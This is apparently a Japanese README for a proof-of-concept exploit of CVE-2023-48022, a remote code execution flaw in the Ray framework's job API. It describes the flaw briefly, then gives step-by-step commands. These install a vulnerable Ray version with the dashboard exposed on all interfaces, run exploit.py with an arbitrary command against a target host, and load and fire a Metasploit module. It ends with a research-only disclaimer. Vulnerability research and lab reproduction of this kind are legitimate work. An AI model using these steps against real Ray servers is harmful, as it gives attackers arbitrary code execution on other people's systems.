
ShadowRay RCE POC (CVE-2023-48022)
このエクスプロイトスクリプトとPoCは、vsocietyでの詳細なCVE分析のために記述されています。
PythonベースのAIおよび機械学習アプリケーションに不可欠なツールであるRayフレームワークに、重大なセキュリティ上の問題が発生しました。本質的に、RayはAIやビッグデータプロジェクトに取り組む人々にとってのスイスアーミーナイフのようなものです。CVE-2023-48022として識別されたこの脆弱性は、特にジョブ送信APIに影響を与えます。公式の説明によると、この欠陥によりリモートの攻撃者が任意のコードを実行でき、これらのバージョンのRayを使用するシステムにかなりのリスクをもたらします。この脆弱性の発見は、ソフトウェアフレームワーク、特に膨大なデータと計算能力を扱うAIおよびMLプロジェクトに不可欠なフレームワークにおける、堅牢なセキュリティプロトコルの重要性を浮き彫りにしました。
まず、Rayをインストールします:
pip3 install -U "ray[default]"==2.8.0
次に、Rayを起動します:
ray start --head --dashboard-host=0.0.0.0
Pythonエクスプロイトを実行します:
python3 exploit.py --host http://192.168.150.16:8265 --cmd '<cmd>'
RubyファイルをMetasploitの関連フォルダにコピーします:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
msfconsoleでMetasploitを起動し、追加したモジュールが見つからない場合はreload_allでモジュールをリロードします。
use exploit/multi/misc/ray_job_rceで選択できます。
必要なオプション(RHOST、RPORT、COMMANDなど)を設定し、exploitコマンドでエクスプロイトを実行します。
このエクスプロイトスクリプトは、研究および効果的な防御技術の開発のみを目的として作成されました。悪意のある行為や不正な活動に使用することは意図されていません。スクリプトの作成者および所有者は、このソフトウェアの誤用や損傷に対する一切の責任を負いません。ご承知おきください。ユーザーはこのソフトウェアを責任を持って、適用される法律および規制に従ってのみ使用することを強く推奨します。責任を持って使用してください。